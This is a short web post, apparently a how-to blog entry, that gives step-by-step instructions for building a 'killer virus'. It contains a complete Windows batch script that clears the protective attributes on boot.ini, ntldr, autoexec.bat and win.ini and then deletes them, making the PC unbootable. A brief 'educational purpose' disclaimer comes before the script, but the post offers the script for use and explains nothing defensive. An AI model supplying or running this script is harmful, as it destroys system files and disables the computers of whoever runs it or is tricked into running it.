How to create a virus to crash a PC for forever??
Warning:-
This article is only for educational purpose. It is just to show the power of batch programming
Steps to create killer virus
1. open your notepad
2. now copy the below code
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
3. Now save it as killer.bat
4. So that’s it, killer virus is created
REMEMBER:- Do not click on this file because this virus deletes all files that are needed to start a computer.
>hope you like it, stay updated & follow us for more exciting tricks